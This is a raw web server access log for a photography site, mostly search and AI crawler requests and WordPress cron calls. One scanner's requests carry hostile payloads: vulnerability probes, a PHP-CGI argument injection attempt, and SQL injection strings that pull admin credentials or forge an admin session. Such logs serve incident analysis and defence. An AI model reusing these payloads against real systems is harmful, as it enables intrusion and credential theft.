157.20.32.210 - - [18/Oct/2025:12:46:17 -0400] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:12:46:56 -0400] "GET /products60906156?kg=0060163479 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
159.65.133.66 - - [18/Oct/2025:12:47:10 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
66.249.64.106 - - [18/Oct/2025:12:47:25 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=59810 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:12:47:57 -0400] "GET /products121711338?kg=0120227136 HTTP/1.1" 200 29046 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:12:48:08 -0400] "GET /?products5045382?kg=0004983934 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.236.253.5 - - [18/Oct/2025:12:49:08 -0400] "GET / HTTP/1.1" 200 4189 "-" "-"
20.171.207.254 - - [18/Oct/2025:12:49:07 -0400] "GET /products60903036?kg=0060160399 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:12:49:16 -0400] "GET /?products579298?kg=0000572316 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:12:49:28 -0400] "POST /main/webservices/additional_webservices.php HTTP/1.1" 404 12304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:12:49:32 -0400] "GET /?products5212244?kg=0005148763 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:12:50:14 -0400] "GET /products111853376?kg=0110489393 HTTP/1.1" 200 29271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:12:51:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760806276.4746899604797363281250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:51:14 -0400] "GET /products60882048?kg=0060139665 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:12:51:21 -0400] "GET /products111579122?kg=0110218484 HTTP/1.1" 200 28852 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:12:52:16 -0400] "GET /products60917176?kg=0060174365 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:12:47:34 -0400] "GET /?products230220?kg=0000227495 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:12:48:03 -0400] "POST /wp-cron.php?doing_wp_cron=1760806083.1788489818572998046875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:48:01 -0400] "GET /products60916114?kg=0060173316 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:12:48:25 -0400] "GET /products11809604?kg=0011665667 HTTP/1.1" 200 28795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:12:49:09 -0400] "POST /wp-cron.php?doing_wp_cron=1760806149.2722918987274169921875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:12:49:29 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
185.61.153.107 - - [18/Oct/2025:12:49:30 -0400] "POST /wp-cron.php?doing_wp_cron=1760806170.8777680397033691406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:12:49:48 -0400] "POST /Servlet/Skins HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:12:49:53 -0400] "POST /admin/login.php HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
157.20.32.210 - - [18/Oct/2025:12:49:55 -0400] "GET /34EYbCCmhm3BeZLNVeaZtQQ3z6J.jsp HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:12:50:00 -0400] "GET /admin/dashboard.php HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22"
20.171.207.254 - - [18/Oct/2025:12:50:10 -0400] "GET /products60940058?kg=0060196968 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:12:50:13 -0400] "GET /?products5211970?kg=0005148492 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:12:50:26 -0400] "GET /?products5081658?kg=0005019768 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:12:50:39 -0400] "POST /wp-cron.php?doing_wp_cron=1760806239.2822039127349853515625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:12:50:36 -0400] "POST /api/v1/snapshots HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/58.0.1"
157.20.32.210 - - [18/Oct/2025:12:51:14 -0400] "POST /jeecg-boot/jmreport/show HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:12:52:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760806338.2752039432525634765625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
54.225.181.161 - - [18/Oct/2025:12:53:01 -0400] "GET /infinite-grid/ HTTP/1.1" 200 16713 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:12:53:04 -0400] "GET /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
184.73.195.18 - - [18/Oct/2025:12:53:04 -0400] "GET /portfolio/chromecast-support/ HTTP/1.1" 200 17418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:12:53:08 -0400] "GET /wp-login.php HTTP/1.1" 200 2344 "https://salhab360photos.com/login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
157.20.32.210 - - [18/Oct/2025:12:53:11 -0400] "GET /eltqfzm HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.5"
185.61.153.107 - - [18/Oct/2025:12:53:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760806403.1745328903198242187500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:12:54:33 -0400] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
66.249.64.107 - - [18/Oct/2025:12:55:03 -0400] "GET /odr/order/apiGetCartItems/ HTTP/1.1" 200 29109 "https://salhab360photos.com/products122873192?kg=0121374821" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:12:55:31 -0400] "POST /wp-cron.php?doing_wp_cron=1760806531.2679059505462646484375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:55:28 -0400] "GET /products60890662?kg=0060148174 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:12:55:51 -0400] "GET /_images/zW8r7i HTTP/1.1" 404 10900 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
3.10.142.179 - - [18/Oct/2025:12:56:23 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
206.189.247.132 - - [18/Oct/2025:12:56:23 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
146.190.11.185 - - [18/Oct/2025:12:56:25 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
185.61.153.107 - - [18/Oct/2025:12:56:38 -0400] "POST /wp-cron.php?doing_wp_cron=1760806598.8673319816589355468750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:56:31 -0400] "GET /products60903660?kg=0060161015 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:12:57:18 -0400] "GET /categories/12362112 HTTP/1.1" 200 28923 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
185.61.153.107 - - [18/Oct/2025:12:57:41 -0400] "POST /wp-cron.php?doing_wp_cron=1760806660.7687931060791015625000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:57:35 -0400] "GET /products60904184?kg=0060161533 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
148.251.181.170 - - [18/Oct/2025:12:57:58 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99"
157.20.32.210 - - [18/Oct/2025:12:58:08 -0400] "POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1" 404 12308 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:12:58:48 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
66.249.64.107 - - [18/Oct/2025:12:58:58 -0400] "GET /categories/12392908 HTTP/1.1" 200 29307 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
157.20.32.210 - - [18/Oct/2025:12:59:01 -0400] "GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:12:59:07 -0400] "GET /appliance/login HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:12:52:26 -0400] "GET /?products579858?kg=0000572868 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:12:52:57 -0400] "POST /ajax.php?action=save_user HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12"
157.20.32.210 - - [18/Oct/2025:12:53:03 -0400] "POST /goform/aspForm HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/113.0"
18.209.201.119 - - [18/Oct/2025:12:53:13 -0400] "GET /wp-content/uploads/2023/04/v-mp3.jpg?745771 HTTP/1.1" 200 37601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:12:53:21 -0400] "GET /products60940464?kg=0060197369 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:12:54:23 -0400] "GET /?products13811588?kg=0013643235 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:12:54:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760806465.8716320991516113281250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:54:23 -0400] "GET /products60878404?kg=0060136067 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.70.29.56 - - [18/Oct/2025:12:54:48 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
157.20.32.210 - - [18/Oct/2025:12:55:45 -0400] "POST /api/runscript HTTP/1.1" 404 10856 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12"
157.20.32.210 - - [18/Oct/2025:12:56:59 -0400] "POST /main/webservices/additional_webservices.php HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
157.20.32.210 - - [18/Oct/2025:12:57:03 -0400] "GET /wlm/login?next=/wlm HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363"
157.20.32.210 - - [18/Oct/2025:12:57:13 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15"
148.251.181.170 - - [18/Oct/2025:12:58:01 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99"
185.61.153.107 - - [18/Oct/2025:12:58:40 -0400] "POST /wp-cron.php?doing_wp_cron=1760806720.1696240901947021484375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:58:37 -0400] "GET /products60929726?kg=0060186762 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:12:58:59 -0400] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Mobile/15E148 Safari/604.1"
216.73.216.159 - - [18/Oct/2025:12:59:49 -0400] "GET /products56748510?kg=0056056538 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:13:00:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760806814.5727460384368896484375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:13:00:09 -0400] "GET /products158698536?kg=0156763269 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:00:27 -0400] "GET /products175143996?kg=0173008175 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:00:33 -0400] "GET /products32027228?kg=0031636735 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.56.161.36 - - [18/Oct/2025:13:00:33 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASEJS; rv:11.0) like Gecko"
216.73.216.159 - - [18/Oct/2025:13:00:49 -0400] "GET /products182022812?kg=0179803103 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:01:01 -0400] "GET /products218239150?kg=0215577778 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:13:01:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760806880.3712849617004394531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:13:01:11 -0400] "POST /pig/add-pig.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:13:01:22 -0400] "POST /pig/add-pig.php HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1"
66.249.64.106 - - [18/Oct/2025:13:01:37 -0400] "GET /?products579166?kg=0000572186 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:13:01:53 -0400] "GET /products60936332?kg=0060193287 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:13:02:45 -0400] "POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%2734EYbWrkzFoFjCBWHQQA0dPweKT%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+IpAddress=%27157.20.32.210%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%2734EYbWrkzFoFjCBWHQQA0dPweKT%27%23 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/12.0"
157.20.32.210 - - [18/Oct/2025:12:59:27 -0400] "POST /loadfile.lp?pageid=Configure HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0"
216.73.216.159 - - [18/Oct/2025:12:59:36 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:12:59:36 -0400] "GET /products87972220?kg=0086899471 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:12:59:46 -0400] "POST /wp-cron.php?doing_wp_cron=1760806786.8695650100708007812500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:12:59:42 -0400] "GET /products60921900?kg=0060179031 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:12:59:57 -0400] "GET /products130109036?kg=0128522423 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:00:03 -0400] "GET /products73879462?kg=0072978574 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:13:00:23 -0400] "GET /products14316102?kg=0014141598 HTTP/1.1" 200 28967 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:13:00:18 -0400] "GET /products34939134?kg=0034513130 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:13:00:53 -0400] "GET /products12825834?kg=0012669504 HTTP/1.1" 200 29568 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:13:00:54 -0400] "GET /products10966270?kg=0010832618 HTTP/1.1" 200 29218 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
